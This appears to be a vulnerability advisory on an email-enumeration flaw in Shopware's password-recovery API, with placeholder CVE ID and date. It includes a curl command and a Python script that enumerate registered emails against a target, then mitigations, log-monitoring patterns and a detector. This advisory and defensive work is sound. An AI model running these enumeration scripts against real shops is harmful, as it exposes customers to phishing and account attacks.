Shopware, Information Disclosure, CVE-2024-XXXX (Medium)

How the CVE Works:

The vulnerability exists in Shopware’s `store-api` endpoint /store-api/account/recovery-password, which handles password recovery requests. When an attacker submits an email address, the API responds differently based on whether the email is registered:
– If the email does not exist, the API returns a 404 error with a clear message:

{"errors":[{"status":"404","code":"CHECKOUT__CUSTOMER_NOT_FOUND","detail":"No matching customer for the email '[email protected]' was found."}]}

– If the email exists, the API responds with a success message, confirming account presence.
This discrepancy allows attackers to enumerate valid user emails, facilitating phishing or brute-force attacks.

DailyCVE Form:

Platform: Shopware
Version: <6.6.10.3, <6.5.8.17
Vulnerability: Email Enumeration
Severity: Medium
Date: 2024-XX-XX

What Undercode Says:

Exploitation:

1. Manual Testing:

curl -X POST https://target.com/store-api/account/recovery-password -H 'Content-Type: application/json' -d '{"email":"[email protected]"}'

– Check for `404` (invalid) vs. `200` (valid).

2. Automated Enumeration:

import requests

emails = ["[email protected]", "[email protected]"]
for email in emails:
    r = requests.post("https://target.com/store-api/account/recovery-password", json={"email": email})
    # a 404 body carries CHECKOUT__CUSTOMER_NOT_FOUND; any other response means the address is registered
    if "CHECKOUT__CUSTOMER_NOT_FOUND" not in r.text:
        print(f"Valid email: {email}")

Mitigation:

1. Patch: Upgrade to Shopware 6.6.10.3 or 6.5.8.17.

2. Rate Limiting: Restrict API requests per IP:

# The api_limit zone must be declared once in the http {} context before it can be used here, e.g.
# limit_req_zone $binary_remote_addr zone=api_limit:10m rate=5r/m;
location /store-api/account/recovery-password {
    limit_req zone=api_limit burst=5;
}

3. Obfuscate Responses: Return generic messages (e.g., “If the email exists, a recovery link was sent”).

4. WAF Rules: Block repeated enumeration attempts:

# Fail2Ban jail for HTTP 404 abuse (jail.local); the filter named below must be
# defined separately in filter.d/shopware-enum-attempts.conf
[shopware-enum]
enabled = true
filter = shopware-enum-attempts
logpath = /var/log/nginx/access.log
action = iptables-multiport[name=ShopwareEnum, port="80,443", protocol=tcp]

5. Log Monitoring: Alert on abnormal `/recovery-password` activity:

# In the nginx combined format the request line ends with ` HTTP/x.y"` before the status,
# so the pattern must allow for that rather than a single character between path and 404.
grep -P 'POST /store-api/account/recovery-password[^"]*" 404 ' /var/log/nginx/access.log | wc -l
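As an added example (not code from the original post or from Shopware), a Python detector that goes one step beyond the grep above: it parses nginx combined-format access-log lines and flags any client that collects five or more customer-not-found (404) answers from the recovery endpoint within a one-minute sliding window. The log lines, IP addresses and threshold are constructed for the demonstration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in nginx "combined" format (not real traffic; IPs are from the
# documentation ranges). 203.0.113.5 hammers the endpoint; 198.51.100.7 mistyped an address once.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2024:12:00:01 +0000] "POST /store-api/account/recovery-password HTTP/1.1" 404 152 "-" "curl/8.4.0"
203.0.113.5 - - [10/Mar/2024:12:00:01 +0000] "POST /store-api/account/recovery-password HTTP/1.1" 404 152 "-" "curl/8.4.0"
203.0.113.5 - - [10/Mar/2024:12:00:02 +0000] "POST /store-api/account/recovery-password HTTP/1.1" 200 21 "-" "curl/8.4.0"
203.0.113.5 - - [10/Mar/2024:12:00:02 +0000] "POST /store-api/account/recovery-password HTTP/1.1" 404 152 "-" "curl/8.4.0"
203.0.113.5 - - [10/Mar/2024:12:00:03 +0000] "POST /store-api/account/recovery-password HTTP/1.1" 404 152 "-" "curl/8.4.0"
203.0.113.5 - - [10/Mar/2024:12:00:03 +0000] "POST /store-api/account/recovery-password HTTP/1.1" 404 152 "-" "curl/8.4.0"
198.51.100.7 - - [10/Mar/2024:12:00:05 +0000] "POST /store-api/account/recovery-password HTTP/1.1" 404 152 "-" "Mozilla/5.0"
"""
ENDPOINT = "/store-api/account/recovery-password"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')

def parse_line(line):
    """Return (ip, timestamp, method, path, status), or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], m["path"], int(m["status"])

def find_enumerators(log_text, threshold=5, window=timedelta(minutes=1)):
    """Return {ip: total_404s} for clients that received `threshold` or more 404
    (CHECKOUT__CUSTOMER_NOT_FOUND) answers from the recovery endpoint within any
    sliding `window`. 200s are not counted: a successful reset is normal traffic."""
    per_ip = defaultdict(list)
    for line in log_text.splitlines():           # access logs are chronological
        rec = parse_line(line)
        if rec and rec[2] == "POST" and rec[3] == ENDPOINT and rec[4] == 404:
            per_ip[rec[0]].append(rec[1])
    flagged = {}
    for ip, stamps in per_ip.items():
        start = 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window:   # drop stamps that fell out of the window
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = len(stamps)
                break
    return flagged

if __name__ == "__main__":
    print({ip: f"{n} customer-not-found responses" for ip, n in find_enumerators(SAMPLE_LOG).items()})
```

Feed it a real log with `find_enumerators(open("/var/log/nginx/access.log").read())`; the threshold and window should be tuned to the shop's normal reset volume.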

Note: Replace `CVE-2024-XXXX` with the actual CVE ID once assigned.

References:

Reported By: https://github.com/advisories/GHSA-hh7j-6x3q-f52h